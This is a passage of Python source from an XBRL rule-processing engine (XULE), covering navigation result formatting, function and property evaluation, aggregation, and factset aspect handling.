return (0, 'int', component_name)
else:
return (rel['result-order'], 'int', component_name)
def nav_decorate_component_drs_role(rel, direction, component_name, is_start, xule_context):
# if hasattr(rel['relationship'], 'dimension_set'):
if isinstance(rel['relationship'], DimensionRelationship):
return (rel['relationship'].dimension_set.drs_role, 'role', component_name)
else:
return (None, 'none', component_name)
def nav_decorate_component_dimension_type(rel, direction, component_name, is_start, xule_context):
if isinstance(rel['relationship'], DimensionRelationship):
if (is_start and direction == 'down') or (not is_start and direction == 'up'):
dim_type = rel['relationship'].fromDimensionType
else:
dim_type = rel['relationship'].toDimensionType
if dim_type is None:
return (None, 'none', component_name)
else:
return (dim_type, 'string', component_name)
else:
return (None, 'none', component_name)
def nav_decorate_component_dimension_sub_type(rel, direction, component_name, is_start, xule_context):
if isinstance(rel['relationship'], DimensionRelationship):
if (is_start and direction == 'down') or (not is_start and direction == 'up'):
dim_type = rel['relationship'].fromDimensionSubType
else:
dim_type = rel['relationship'].toDimensionSubType
if dim_type is None:
return (None, 'none', component_name)
else:
return (dim_type, 'string', component_name)
else:
return (None, 'none', component_name)
def nav_decorate_component_usable(rel, direction, component_name, is_start, xule_context):
if isinstance(rel['relationship'], DimensionRelationship):
if (is_start and direction == 'down') or (not is_start and direction == 'up'):
concept = rel['relationship'].fromModelObject
else:
concept = rel['relationship'].toModelObject
if rel['relationship'].dimension_set.isUsable(concept) is None:
return (None, 'none', component_name)
else:
return (rel['relationship'].dimension_set.isUsable(concept), 'bool', component_name)
else:
return (None, 'none', component_name)
# Navigation return component tuple locations
NAVIGATE_RETURN_FUCTION = 0
NAVIGATE_ALLOWED_ON_START = 1
NAVIGATE_RETURN_COMPONENTS = {'source': (nav_decorate_component_source, False),
'source-name': (nav_decorate_component_source, False),
'target': (nav_decorate_component_target, True),
'target-name': (nav_decorate_component_target, True),
'order': (nav_decorate_component_order, False),
'weight': (nav_decorate_component_weight, False),
'preferred-label-role': (nav_decorate_component_preferred_label_role, False),
'preferred-label': (nav_decorate_component_preferred_label, False),
'relationship': (nav_decorate_component_relationship, False),
'role': (nav_decorate_component_role, False),
'role-uri': (nav_decorate_component_role_uri, False),
'role-description': (nav_decorate_component_role_description, False),
'arcrole': (nav_decorate_component_arcrole, False),
'arcrole-uri': (nav_decorate_component_arcrole_uri, False),
'arcrole-description': (nav_decorate_component_arcrole_description, False),
'arcrole-cycles-allowed': (nav_decorate_component_cycles_allowed, False),
'link-name': (nav_decorate_component_link_name, False),
'arc-name': (nav_decorate_component_arc_name, False),
'network': (nav_decorate_component_network, False),
'cycle': (nav_decorate_component_cycle, True),
'navigation-order': (nav_decorate_component_navigation_order, True),
'navigation-depth': (nav_decorate_component_navigation_depth, True),
'result-order': (nav_decorate_component_result_order, True),
'drs-role': (nav_decorate_component_drs_role, True),
'dimension-type': (nav_decorate_component_dimension_type, True),
'dimension-sub-type': (nav_decorate_component_dimension_sub_type, True),
'usable': (nav_decorate_component_usable, True),
}
def nav_finish_results(nav_expr, return_items, add_result_order, xule_context):
"""Format the results of navigation.
This function processes the list of results and puts them in their final form.
The options for the final forma are if the results are:
1. a list of relationships
2. a set of relations
3. a dictionary organzed by network of relationships
4. a nested list of paths of the traversal. The outer list is a path and the inner list contains the relationships that make up the path.
Arguments:
nav_expr (dictionary): The navigation expression AST node
return_items (list): The list of the decorated return items.
add_result_order (bool): An indicator if the result order should be added to the results. This is calculated as the return_items are processed.
xule_context (XuleRuleContext): The processing context.
Returns a XuleValue which is the final result of the navigation.
"""
if nav_expr.get('return', dict()).get('byNetwork', False):
by_network = dict()
by_network_shadow = dict()
for network, network_return_items in return_items.items():
processed_items = nav_finish_return_items(nav_expr, network_return_items, add_result_order, xule_context)
by_network[XuleValue(xule_context, network, 'network')] = processed_items
by_network_shadow[network] = processed_items.shadow_collection
return XuleValue(xule_context, frozenset(by_network.items()), 'dictionary',
shadow_collection=frozenset(by_network_shadow.items()))
else:
return nav_finish_return_items(nav_expr, return_items, add_result_order, xule_context)
def nav_finish_return_items(nav_expr, return_items, add_result_order, xule_context):
paths = nav_expr.get('return', dict()).get('paths', False)
if 'return' in nav_expr:
return_type = nav_expr['return'].get('returnType', 'list')
else:
return_type = 'list'
# The return_component_type determins if the return concompents are a list or a dictionary keyed by the component name.
return_component_type = nav_expr.get('return', dict()).get('returnComponentType', 'list')
cur_order = 1
final_results = list()
final_shadow = list()
def handle_return_item(return_item, cur_order):
if add_result_order:
# replace reuslt-order
return_item = [x if x != 'result-order' else (cur_order, 'int', 'result-order') for x in return_item]
# return_item.append((cur_order, 'int', 'result-order'))
cur_order += 1
if return_component_type == 'list':
if len(return_item) == 1:
# A list of single items is returned.
# The return item only has one return component
return XuleValue(xule_context, return_item[0][0], return_item[0][1]), return_item[0][0], cur_order
#
# if return_type == 'list' or (return_type == 'set' and return_item[0][0] not in results_shadow):
# if return_component_type == 'list':
# results.append(XuleValue(xule_context, return_item[0][0], return_item[0][1]))
# results_shadow.append(return_item[0][0])
else:
# A list of list of components is returned.
# The return_item has multiple return componenets
multi_result = list()
multi_shadow = list()
for return_component in return_item:
multi_result.append(XuleValue(xule_context, return_component[0], return_component[1]))
multi_shadow.append(return_component[0])
multi_shadow_tuple = tuple(multi_shadow)
return XuleValue(xule_context, tuple(multi_result), 'list',
shadow_collection=tuple(multi_shadow)), tuple(multi_shadow_tuple), cur_order
# if return_type == 'list' or (return_type == 'set' and multi_shadow_tuple not in results_shadow):
# results.append(XuleValue(xule_context, tuple(multi_result), 'list', shadow_collection=tuple(multi_shadow)))
# results_shadow.append(multi_shadow_tuple)
else: # the return_component_type is a dictionary
multi_result = dict()
multi_shadow = dict()
for return_component in return_item:
multi_result[XuleValue(xule_context, return_component[2], 'string')] = XuleValue(xule_context,
return_component[0],
return_component[1])
multi_shadow[return_component[2]] = return_component[0]
return XuleValue(xule_context, frozenset(multi_result.items()), 'dictionary'), frozenset(
multi_shadow.items()), cur_order
#
# if return_type == 'list' or (return_type == 'set' and frozenset(multi_shadow.items()) not in results_shadow):
# results.append(XuleValue(xule_context, frozenset(multi_result.items()), 'dictionary'))
# results_shadow.append(frozenset(multi_shadow.items()))
#
# return results, results_shadow
for return_item in return_items:
if paths:
path_result = list()
path_shadow = list()
# The return item is a list of the items that make up a path. Process each item in the path.
for path_item in return_item:
path_item_result, path_item_shadow, cur_order = handle_return_item(path_item, cur_order)
path_result.append(path_item_result)
path_shadow.append(path_item_shadow)
# Now the path is complete
item_result = XuleValue(xule_context, tuple(path_result), 'list', shadow_collection=tuple(path_shadow))
item_shadow = tuple(path_shadow)
else:
item_result, item_shadow, cur_order = handle_return_item(return_item, cur_order)
if return_type == 'list':
final_results.append(item_result)
final_shadow.append(item_shadow)
else: # Set
if item_shadow not in final_shadow:
final_results.append(item_result)
final_shadow.append(item_shadow)
if return_type == 'list':
return XuleValue(xule_context, tuple(final_results), 'list', shadow_collection=tuple(final_shadow))
else:
return XuleValue(xule_context, frozenset(final_results), 'set', shadow_collection=frozenset(final_shadow))
def evaluate_function_ref(function_ref, xule_context):
if function_ref['functionName'] in BUILTIN_FUNCTIONS:
function_info = BUILTIN_FUNCTIONS.get(function_ref['functionName'])
if function_info[FUNCTION_TYPE] == 'aggregate':
return evaluate_aggregate_function(function_ref, function_info, xule_context)
elif function_info[FUNCTION_TYPE] == 'regular':
return regular_function(xule_context, function_ref, function_info)
else:
raise XuleProcessingError(_("Unknown function type '{}'.".format(function_info[FUNCTION_TYPE])),
xule_context)
elif function_ref['functionName'] in XuleProperties.PROPERTIES:
return property_as_function(xule_context, function_ref)
else:
# xule defined function
return user_defined_function(xule_context, function_ref)
def property_as_function(xule_context, function_ref):
"""Evaluate a function that is a property.
Some functions are just a function version of a property. In these cases, the first argument is the object of the property and the rest of the args are
arguments to the property.
Example:
-10.abs is the same as abs(-10)
"""
# Get the property information
property_info = XuleProperties.PROPERTIES[function_ref['functionName']]
# Check that there is at least one argument. This is the property object
if len(function_ref['functionArgs']) == 0:
raise XuleProcessingError(
_("The '{}' function must have at least one argumenrt, found none.".format(function_ref['functionName'])),
xule_context)
# Check that the first argument is the right type
property_object = evaluate(function_ref['functionArgs'][0], xule_context)
if len(property_info[XuleProperties.PROP_OPERAND_TYPES]) > 0:
if not (property_object.type in property_info[XuleProperties.PROP_OPERAND_TYPES] or
property_object.is_fact and 'fact' in property_info[XuleProperties.PROP_OPERAND_TYPES] or
any([xule_castable(property_object, allowable_type, xule_context) for allowable_type in
property_info[XuleProperties.PROP_OPERAND_TYPES]])):
raise XuleProcessingError(
_("The first argument of function '{}' must be {}, found '{}'.".format(function_ref['functionName'],
', '.join(property_info[
XuleProperties.PROP_OPERAND_TYPES]),
property_object.type)),
xule_context)
if property_info[XuleProperties.PROP_ARG_NUM] is not None:
property_args = function_ref['functionArgs'][1:]
if property_info[XuleProperties.PROP_ARG_NUM] >= 0 and len(property_args) != property_info[
XuleProperties.PROP_ARG_NUM]:
raise XuleProcessingError(
_("Property '%s' must have %s arguments. Found %i." % (function_ref['functionName'],
property_info[XuleProperties.PROP_ARG_NUM],
len(property_args))),
xule_context)
elif len(property_args) > property_info[XuleProperties.PROP_ARG_NUM] * -1 and property_info[
XuleProperties.PROP_ARG_NUM] < 0:
raise XuleProcessingError(
_("Property '%s' must have no more than %s arguments. Found %i." % (function_ref['functionName'],
property_info[
XuleProperties.PROP_ARG_NUM] * -1,
len(property_args))),
xule_context)
# prepare the arguments
arg_values = []
for arg_expr in property_args:
arg_value = evaluate(arg_expr, xule_context)
arg_values.append(arg_value)
if len(property_info) > 4:
return property_info[XuleProperties.PROP_FUNCTION](xule_context, property_object,
property_info[XuleProperties.PROP_DATA], *arg_values)
else:
return property_info[XuleProperties.PROP_FUNCTION](xule_context, property_object, *arg_values)
def regular_function(xule_context, function_ref, function_info):
if function_info[FUNCTION_ARG_NUM] is not None:
# if the number of argument is none, then the function can have any number of arguments
if function_info[FUNCTION_ARG_NUM] >= 0:
if function_info[FUNCTION_TYPE] == 'regular' and len(function_ref['functionArgs']) != function_info[
FUNCTION_ARG_NUM]:
raise XuleProcessingError(
_("The '%s' function must have only %i argument, found %i." % (function_ref['functionName'],
function_info[FUNCTION_ARG_NUM],
len(function_ref['functionArgs']))),
xule_context)
else:
# The function can have no more than the specified number of arguments.
if function_info[FUNCTION_TYPE] == 'regular' and len(function_ref['functionArgs']) > (
function_info[FUNCTION_ARG_NUM] * -1):
raise XuleProcessingError(
_("The '%s' function must have no more than %i arguments, found %i." % (function_ref['functionName'],
function_info[
FUNCTION_ARG_NUM] * -1,
len(function_ref[
'functionArgs']))),
xule_context)
function_args = []
for function_arg in function_ref['functionArgs']:
# for i in range(len(function_ref.functionArgs)):
if function_info[FUNCTION_ALLOW_UNBOUND_ARGS]:
try:
arg = evaluate(function_arg, xule_context)
except XuleIterationStop as xis:
arg = xis.stop_value
else:
arg = evaluate(function_arg, xule_context)
function_args.append(arg)
return function_info[FUNCTION_EVALUATOR](xule_context, *function_args)
def user_defined_function(xule_context, function_ref):
# check fucntion cache - The function cache is very basic. It only caches on functions that have no args.
if len(function_ref['functionArgs']) == 0 and function_ref[
'functionName'] in xule_context.global_context.function_cache:
return xule_context.global_context.function_cache[function_ref['functionName']]
function_info = xule_context.find_function(function_ref['functionName'])
if function_info is None:
raise XuleProcessingError("Function '%s' not found" % function_ref['functionName'], xule_context)
else:
# # Get the list of variables and their values. This will put the current single value for the variable as an argument
# for var_ref in sorted(function_ref['var_refs'], key=lambda x: x[1]):
# '''NOT SURE THIS IS NEEDED. THE ARGUMENTS WILL BE EXVALUTED WHEN THE for arg in matched_args IS PROCESSED'''
# # 0 = var declaration id, 1 = var name, 2 = var_ref, 3 = var type (1 = var/arg, 2 = constant)
# var_value = evaluate(var_ref[2], xule_context)
matched_args = match_function_arguments(function_ref, function_info['function_declaration'], xule_context)
for arg in matched_args:
try:
arg_value = evaluate(arg['expr'], xule_context)
except XuleIterationStop as xis:
arg_value = xis.stop_value
xule_context.add_arg(arg['name'],
arg['node_id'],
arg['tagged'],
arg_value,
'single')
# add the node_id of the function reference to the prefix used for calculating the processing node id
# This is done before adding the args so the id prefix is set with the function delcaration id before the args are added as varaiables.
xule_context.id_prefix.append(function_ref['node_id'])
body_expr = function_info['function_declaration']['body']
save_aligned_result_only = xule_context.aligned_result_only
def cleanup_function():
# remove the args
for arg in matched_args:
xule_context.del_arg(arg['name'],
arg['node_id'])
# pop the function reference node id off the prefix
xule_context.id_prefix.pop()
# reset the aligned only results.
xule_context.aligned_result_only = save_aligned_result_only
# xule_context.used_expressions = save_used_expressions
function_result_values = isolated_evaluation(xule_context,
function_info['function_declaration']['node_id'],
body_expr,
cleanup_function=cleanup_function # ,
# iteration_reset_function=iteration_reset,
)
if 'is_iterable' in function_ref:
function_results = function_result_values
else:
if None in function_result_values.values:
function_results = function_result_values.values[None][0]
else:
function_results = XuleValue(xule_context, None, 'unbound')
# Cache fucntion results that don't have any arguments.
if len(function_ref['functionArgs']) == 0:
xule_context.global_context.function_cache[function_ref['functionName']] = function_results
# if function_ref.get('cacheable') == True:
# xule_context.global_context.function_cache[cache_key] = function_results
#
return function_results
def isolated_evaluation(xule_context, node_id, expr, setup_function=None, cleanup_function=None,
iteration_reset_function=None):
save_aligned_result_only = xule_context.aligned_result_only
save_used_expressions = xule_context.used_expressions
# pre_aggregation_table_list_size = len(xule_context.iteration_table)
isolated_table = xule_context.iteration_table.add_table(node_id, xule_context.get_processing_id(node_id),
is_aggregation=True)
try:
if setup_function is not None:
setup_function()
return_values = XuleValueSet()
while True:
xule_context.aligned_result_only = False
xule_context.used_expressions = set()
try:
return_value = evaluate(expr,
xule_context) # , glob_cache_key=body_expr['node_id'] if len(matched_args)==0 else None)
except XuleIterationStop as xis:
return_value = xis.stop_value # XuleValue(xule_context, None, 'unbound')
return_value.facts = xule_context.facts.copy()
return_value.tags = xule_context.tags.copy()
return_value.aligned_result_only = xule_context.aligned_result_only
return_value.used_expressions = xule_context.used_expressions
return_value.alignment = xule_context.iteration_table.current_table.current_alignment
# return_value.alignment = isolated_table.current_alignment
return_values.append(return_value)
# xule_context.iteration_table.del_current()
xule_context.iteration_table.next(isolated_table.table_id)
if iteration_reset_function is not None:
iteration_reset_function()
# if len(xule_context.iteration_table) == pre_aggregation_table_list_size:
if isolated_table.is_empty:
break
finally:
# ensure that the isolated table is removed if there is an exception.
xule_context.iteration_table.del_table(isolated_table.table_id)
# reset the aligned only results.
xule_context.aligned_result_only = save_aligned_result_only
xule_context.used_expressions = save_used_expressions
if cleanup_function is not None:
cleanup_function()
return return_values
def evaluate_aggregate_function(function_ref, function_info, xule_context):
'''Aggregation functions
Aggregation functions perform 2 types of aggregation. The first is to collapse iterations generated from evaluating
the arguments of the aggregation fucntion. This is essentially the opposite of a for loop. The second is to combine
the values generated from each argument.
'''
# Evaluate each argument
values_by_argument = list()
for function_arg in function_ref['functionArgs']:
values_by_argument.append(isolated_evaluation(xule_context, function_ref['node_id'], function_arg))
# Combine the value sets created from each argument
# Get all alignments
all_alignments = set()
for arg_value_set in values_by_argument:
for alignment in arg_value_set:
all_alignments.add(alignment)
# Go through each alignment and pull the values from each of the arguments
values_by_alignment = collections.defaultdict(list)
# The aligned_result_only and used_expressions need to be aggregated
aligned_result_only_by_alignment = collections.defaultdict(lambda: False)
used_expressions_by_alignment = collections.defaultdict(set)
for alignment in all_alignments:
values_by_alignment[alignment] = list()
for arg_value_set in values_by_argument:
if alignment in arg_value_set:
arg_alignment = alignment
else:
# This will match none aligned values to aligned values (i.e. 1 and @Assets)
arg_alignment = None
for arg_value in arg_value_set.values[arg_alignment]:
if arg_value.type != 'unbound':
values_by_alignment[alignment].append(arg_value)
aligned_result_only_by_alignment[alignment] = aligned_result_only_by_alignment[alignment] or arg_value.aligned_result_only
used_expressions_by_alignment[alignment].update((arg_value.used_expressions))
# Go through each alignment and apply the aggregation function
agg_values = XuleValueSet()
# add default value if there are no None aligned results and the aggregation has a default value.
if None not in values_by_alignment and function_info[FUNCTION_DEFAULT_VALUE] is not None:
agg_values.append(
XuleValue(xule_context, function_info[FUNCTION_DEFAULT_VALUE], function_info[FUNCTION_DEFAULT_TYPE]))
for alignment in values_by_alignment:
if len(values_by_alignment[alignment]) > 0:
agg_value = function_info[FUNCTION_EVALUATOR](xule_context, values_by_alignment[alignment])
else:
# Add the default value if there is one
if function_info[FUNCTION_DEFAULT_VALUE] is not None:
agg_value = XuleValue(xule_context, function_info[FUNCTION_DEFAULT_VALUE],
function_info[FUNCTION_DEFAULT_TYPE])
else:
agg_value = None
if agg_value is not None:
#if (aligned_result_only_by_alignment[alignment] and
# alignment is None and
# xule_context.iteration_table.current_table.current_alignment is None):
# agg_value = XuleValue(xule_context, None, 'unbound')
#if (aligned_result_only_by_alignment[alignment] and
# alignment is None ):
# agg_value = XuleValue(xule_context, None, 'unbound')
agg_value.alignment = alignment
agg_value.aligned_result_only = aligned_result_only_by_alignment[alignment]
# print("agg", function_ref['exprName'], function_ref['node_id'], len(xule_context.used_expressions), len(used_expressions))
agg_value.used_expressions = used_expressions_by_alignment[alignment]
agg_values.append(agg_value)
return agg_values
def evaluate_property(property_expr, xule_context):
# The object_value is the left side of the property expression
object_value = evaluate(property_expr['expr'], xule_context)
# The properties expression is an object and then a chain of properties (i.e. Assets[]::concept::name::local-part)
for current_property_expr in property_expr['properties']:
# Check that this is a valid property
if current_property_expr['propertyName'] not in XuleProperties.PROPERTIES:
raise XuleProcessingError(_("'%s' is not a valid property." % current_property_expr['propertyName']),
xule_context)
property_info = XuleProperties.PROPERTIES[current_property_expr['propertyName']]
# Check if the property can operate on a set or list.
if object_value.type not in ('set', 'list') or (object_value.type in ('set', 'list') and len(
{'set', 'list'} & set(property_info[XuleProperties.PROP_OPERAND_TYPES])) > 0):
pass
object_value = process_property(current_property_expr, object_value, property_info, xule_context)
else:
# This is a set or list. The property is not for a set or list, so try to create a new set or list after applying the property to the members.
if object_value.type == 'set':
new_list = set()
new_shadow = set()
else:
new_list = list()
new_shadow = list()
for item in object_value.value:
new_value = process_property(current_property_expr, item, property_info, xule_context)
if object_value.type == 'set':
if (new_value.shadow_collection if new_value.type in (
'set', 'list', 'dictionary') else new_value.value) not in new_shadow:
new_list.add(new_value)
new_shadow.add(new_value.shadow_collection if new_value.type in (
'set', 'list', 'dictionary') else new_value.value)
else: # list
new_list.append(new_value)
new_shadow.append(new_value.shadow_collection if new_value.type in (
'set', 'list', 'dictionary') else new_value.value)
if object_value.type == 'set':
object_value = XuleValue(xule_context, frozenset(new_list), 'set',
shadow_collection=frozenset(new_shadow))
else: # list
object_value = XuleValue(xule_context, tuple(new_list), 'list', shadow_collection=frozenset(new_shadow))
return object_value
def process_property(current_property_expr, object_value, property_info, xule_context):
# Check that the left object is the right type
# if the left object is unbound then return unbound
if not property_info[XuleProperties.PROP_UNBOUND_ALLOWED] and object_value.type in ('unbound', 'none'):
return object_value
else:
# check the left object is the right type
if len(property_info[XuleProperties.PROP_OPERAND_TYPES]) > 0:
if not (object_value.type in property_info[XuleProperties.PROP_OPERAND_TYPES] or
object_value.is_fact and 'fact' in property_info[XuleProperties.PROP_OPERAND_TYPES] or
any([xule_castable(object_value, allowable_type, xule_context) for allowable_type in
property_info[XuleProperties.PROP_OPERAND_TYPES]]) or
(object_value.type in ('none', 'unbound') and property_info[XuleProperties.PROP_UNBOUND_ALLOWED])):
# print(current_property_expr['node_id'])
raise XuleProcessingError(
_("Property '%s' is not a property of a '%s'.") % (current_property_expr['propertyName'],
object_value.type),
xule_context)
# property_info = XuleProperties.PROPERTIES[current_property_expr['propertyName']]
if property_info[XuleProperties.PROP_ARG_NUM] is not None:
property_args = current_property_expr.get('propertyArgs', [])
if property_info[XuleProperties.PROP_ARG_NUM] >= 0 and len(property_args) != property_info[
XuleProperties.PROP_ARG_NUM]:
raise XuleProcessingError(
_("Property '%s' must have %s arguments. Found %i." % (current_property_expr['propertyName'],
property_info[XuleProperties.PROP_ARG_NUM],
len(property_args))),
xule_context)
elif len(property_args) > property_info[XuleProperties.PROP_ARG_NUM] * -1 and property_info[
XuleProperties.PROP_ARG_NUM] < 0:
raise XuleProcessingError(_(
"Property '%s' must have no more than %s arguments. Found %i." % (current_property_expr['propertyName'],
property_info[
XuleProperties.PROP_ARG_NUM] * -1,
len(property_args))),
xule_context)
# prepare the arguments
arg_values = []
for arg_expr in property_args:
arg_value = evaluate(arg_expr, xule_context)
arg_values.append(arg_value)
if len(property_info) > 4: # There is property data
object_value = property_info[XuleProperties.PROP_FUNCTION](xule_context, object_value,
property_info[XuleProperties.PROP_DATA], *arg_values)
else:
object_value = property_info[XuleProperties.PROP_FUNCTION](xule_context, object_value, *arg_values)
if 'tagName' in current_property_expr:
xule_context.tags[current_property_expr['tagName']] = object_value
return object_value
def evaluate_index(index_expr, xule_context):
# evaluate the left side of the expression
left_value = evaluate(index_expr['expr'], xule_context)
for index in index_expr['indexes']:
index_value = evaluate(index, xule_context)
# An index expression is used for lists and dictionaries.
left_value = XuleProperties.property_index(xule_context, left_value, index_value)
return left_value
def evaluate_tag_ref(tag_ref, xule_context):
if tag_ref['varName'] in xule_context.tags:
return xule_context.tags[tag_ref['varName']]
else:
# The reference may be to a constant
cat_const = xule_context.global_context.catalog['constants'].get(tag_ref['varName'])
if cat_const is not None:
ast_const = xule_context.global_context.rule_set.getItem(cat_const)
# If the constant is iterable and it was never used in the rule body, it cannot be calculated for the message.
# There would be no way to determing which value to use.
if ast_const['number'] == 'single':
const_info = xule_context.find_var(tag_ref['varName'], ast_const['node_id'])
if const_info['type'] == xule_context._VAR_TYPE_CONSTANT:
if not const_info.get('calculated'):
var_value = evaluate(ast_const, xule_context)
return const_info['value'].values[None][0]
# If here the tag could not be found
return XuleValue(xule_context, None, 'none')
# aspect info indexes
TYPE = 0
ASPECT = 1
SPECIAL_VALUE = 2
ASPECT_OPERATOR = 3
ASPECT_PROPERTY = 4
EVALUATOR = {
# rules
"assertion": evaluate_assertion,
"outputRule": evaluate_output_rule,
# literals
"boolean": evaluate_bool_literal,
"integer": evaluate_int_literal,
"float": evaluate_float_literal,
"string": evaluate_string_literal,
"period": evaluate_period_literal,
"qname": evaluate_qname_literal,
# "skip": evaluate_void_literal,
"none": evaluate_void_literal,
# atomic expressions
"constantDeclaration": evaluate_constant_assign,
"ifExpr": evaluate_if,
"forExpr": evaluate_for,
# "forControl": evaluate_for_control,
# "forLoop": evaluate_for_loop,
# "forBodyExpr": evaluate_for_body,
# "withExpr": evaluate_with,
"blockExpr": evaluate_block,
"varRef": evaluate_var_ref,
"tagRef": evaluate_tag_ref,
"functionReference": evaluate_function_ref,
"taggedExpr": evaluate_tagged,
"propertyExpr": evaluate_property,
"indexExpr": evaluate_index,
"factset": evaluate_factset,
"navigation": evaluate_navigate,
"filter": evaluate_filter,
#"dictExpr": evaluate_dict,
#"listExpr": evaluate_list,
#"setExpr": evaluate_set,
# expressions with order of operations
"unaryExpr": evaluate_unary,
"inExpr": evaluate_in,
"multExpr": evaluate_mult,
"addExpr": evaluate_add,
"intersectExpr": evaluate_intersect,
"symetricDifferenceExpr": evaluate_symetric_difference,
"compExpr": evaluate_comp,
"notExpr": evaluate_not,
"andExpr": evaluate_and,
"orExpr": evaluate_or,
# severity
'severity': evaluate_severity,
# aspect name literal
'aspectName': evaluate_aspect_name,
# balance
'balance': evaluate_string_keyword,
'periodType': evaluate_string_keyword,
}
# the position of the function information
FUNCTION_TYPE = 0
FUNCTION_EVALUATOR = 1
FUNCTION_ARG_NUM = 2
# aggregate only
FUNCTION_DEFAULT_VALUE = 3
FUNCTION_DEFAULT_TYPE = 4
# non aggregate only
FUNCTION_ALLOW_UNBOUND_ARGS = 3
FUNCTION_RESULT_NUMBER = 4
def built_in_functions():
return XuleFunctions.BUILTIN_FUNCTIONS
BUILTIN_FUNCTIONS = XuleFunctions.BUILTIN_FUNCTIONS
def process_factset_aspects(factset, xule_context):
"""Build list of aspects as descried in the factset
This function returns 3 dictionaries.
1. A dictionary of aspect filters that will not be included in the alignment. These are indicated with @ (single) in the factset expression.
2. A dictionary of aspect filters that will be included in the alginment. These are indicated with @@ (double) in the factset expression.
3. A dictionary of variables based on aspect aliases.
The aspect filters dictionaries (the first 2 dictionaries) are keyed by a tuple of 4 items:
1. aspect type - This is either 'builtin' or 'explicit_dimension'
2. aspect name - For built in aspects it is one of 'concept', 'entity', 'period', 'unit' or 'cube'
For dimensional aspects it is the qname of the dimension
3. special value - If the aspect uses a wildcard, this will contain the wildcard character '*'. Otherwise it is None.
4. aspect operator - This is the operator used for the filter. It is one of '=', '!=', 'in' or 'not in'. If there is not aspect operator
the value is None.
5. aspect properties - This is a tuple. The first time is the property name and second item is a list of evaluated tuple of arguments.
The value of the key is the evaluated expression on the right of the aspect operator. If there is no operator, then the value is None.
The dictionary of aspect variables is key by a the alias name. The value is a tuple of 3 items:
1. aspect type - This is either 'builtin' or 'explicit_dimension'
2. aspect name - For built in aspects it is one of 'concept', 'entity', 'period', 'unit' or 'cube'
For dimensional aspects it is the qname of the dimension
3. aspect index - This is the node_id of the aspect filter.
"""
non_align_aspects = {}
align_aspects = {}
aspect_vars = {}
alternate_notation = False
'''COULD CHECK FOR DUPLICATE ASPECTS IN THE FACTSET'''
for aspect_filter in factset.get('aspectFilters', list()):
# Set the dictionary to use based on if the aspect is covered (single @ - non aligned) vs. uncoverted (double @@ - aligned)
aspect_dictionary = non_align_aspects if aspect_filter['coverType'] == 'covered' else align_aspects
aspect_var_name = aspect_filter.get('alias')
# evaluate the aspectName
aspect_name = evaluate(aspect_filter['aspectName'], xule_context)
if aspect_name.type == 'aspect_name':
# This is a built in aspect - one of concept, period, entity, unit or table
add_aspect_var(aspect_vars, 'builtin', aspect_name.value, aspect_var_name,
aspect_filter['node_id'], xule_context)
if aspect_name.value == 'concept' and alternate_notation:
raise XuleProcessingError(_(
"The factset specifies the concept aspect as both @{0} and @concept={0}. Only one method should be used".format(
aspect_name.value)), xule_context)
aspect_info, aspect_value = process_aspect_expr(aspect_filter, 'builtin', aspect_name.value, xule_context)
if aspect_info is not None:
aspect_dictionary[aspect_info] = aspect_value
elif aspect_name.type == 'qname':
# This is either a dimension aspect or the default concept aspect. The aspect name is determined by evaluating the aspectDimensionName
# Get the model concept to determine if the aspect is a dimension
aspect_filter_model_concept = xule_context.model.qnameConcepts.get(aspect_name.value)
if aspect_filter_model_concept is None:
raise XuleProcessingError(
_("Error while processing factset aspect. Concept %s not found." % aspect_name.value.clarkNotation),
xule_context)
if aspect_filter_model_concept.isDimensionItem:
# This is a dimension aspect
add_aspect_var(aspect_vars, 'explicit_dimension', aspect_name.value, aspect_var_name,
aspect_filter['node_id'], xule_context)
aspect_info, aspect_value = process_aspect_expr(aspect_filter, 'explicit_dimension', aspect_name.value,
xule_context)
if aspect_info is not None:
aspect_dictionary[aspect_info] = aspect_value
else:
# This is a concept aspect and the filter name is really the aspect value (i.e. @Assets)
if aspect_in_filters('builtin', 'concept', aspect_dictionary):
raise XuleProcessingError(_(
"The factset specifies the concept aspect as both @{0} and @concept={0}. Only one method should be used".format(
aspect_name.value)), xule_context)
alternate_notation = True # Indicate that the concept aspect is provided
aspect_dictionary[('builtin', 'concept', None, '=', None)] = aspect_name
add_aspect_var(aspect_vars, 'builtin', 'concept', aspect_var_name, aspect_filter['node_id'],
xule_context)
else:
raise XuleProcessingError(_(
"An aspect name must be one of 'concept', 'unit', 'period', 'entity' or a dimension qname, found '{}'.".format(
aspect_name.type)), xule_context)
# aspect_filter_qname = evaluate(aspect_filter.aspectName.qName, xule_context).value
# #verify that lineItem is not used in both forms of the notation, i.e. Assets[lineItem=Liabilities].
# aspect_var_name = aspect_filter.get('aspectVar')
# if aspect_filter_qname.prefix is None and aspect_filter_qname.localName in BUILTIN_ASPECTS:
# #the aspect is builtin
# if aspect_filter_qname.localName == 'concept' and alternate_notation:
# XuleProcessingError(_("The factset specifies the lineItem both outside and inside the factset."), xule_context)
#
# if aspect_filter.get('all'):
# aspect_info = ('builtin', aspect_filter_qname.localName, aspect_filter.all, aspect_filter.aspectOperator)
# non_align_aspects[aspect_info] = XuleValue(xule_context, None, 'none')
# add_aspect_var(aspect_vars, 'builtin', aspect_filter_qname.localName, aspect_var_name, aspect_filter['node_id'], xule_context)
# elif aspect_filter.get('void'):
# non_align_aspects[('builtin', aspect_filter_qname, 'none', aspect_filter.aspectOperator)] = XuleValue(xule_context, None, 'none')
# add_aspect_var(aspect_vars, 'builtin', aspect_filter_qname.localName, aspect_var_name, aspect_filter['node_id'], xule_context)
# else:
# aspect_info = ('builtin', aspect_filter_qname.localName, None, aspect_filter.aspectOperator)
# non_align_aspects[aspect_info] = evaluate(aspect_filter.aspectExpr[0], xule_context)
# add_aspect_var(aspect_vars, 'builtin', aspect_filter_qname.localName, aspect_var_name, aspect_filter['node_id'], xule_context)
# else:
# #This is a dimensional aspect.
# if aspect_filter.get('all'):
# non_align_aspects[('explicit_dimension', aspect_filter_qname, aspect_filter.all, aspect_filter.aspectOperator)] = XuleValue(xule_context, None, 'none')
# add_aspect_var(aspect_vars, 'explicit_dimension', aspect_filter_qname, aspect_var_name, aspect_filter['node_id'], xule_context)
# elif aspect_filter.get('void'):
# non_align_aspects[('explicit_dimension', aspect_filter_qname, 'none', aspect_filter.aspectOperator)] = XuleValue(xule_context, None, 'none')
# add_aspect_var(aspect_vars, 'explicit_dimension', aspect_filter_qname, aspect_var_name, aspect_filter['node_id'], xule_context)
# else:
# if not(aspect_filter.get('aspectExpr')):
# #There is no member. In this case the aspect may have varname, but it dones not participate in the non_align.
# add_aspect_var(aspect_vars, 'explicit_dimension', aspect_filter_qname, aspect_var_name, aspect_filter['node_id'], xule_context)
# else:
